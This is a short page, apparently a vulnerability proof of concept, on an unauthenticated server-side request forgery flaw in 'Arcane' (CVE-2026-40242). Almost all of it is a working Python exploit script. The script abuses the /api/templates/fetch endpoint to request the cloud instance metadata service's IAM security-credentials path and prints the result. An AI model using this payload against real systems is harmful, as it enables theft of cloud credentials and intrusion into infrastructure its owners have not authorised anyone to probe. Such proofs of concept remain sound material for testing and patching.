CVE-2026-40242 Arcane 未认证SSRF漏洞

import requests def check_ssrf(target_base_url): """ PoC for CVE-2026-40242 Arcane SSRF Vulnerability This script attempts to retrieve the instance metadata via the vulnerable endpoint. """ target_url = f"{target_base_url.rstrip('/')}/api/templates/fetch" # Using a common internal metadata endpoint for testing # Change to http://127.0.0.1:80 or internal IPs for local testing payload_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" params = { "url": payload_url } try: print(f"[*] Sending request to: {target_url}") print(f"[*] Payload URL: {payload_url}") response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] SSRF Successful! Response received:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost:3000" check_ssrf(target)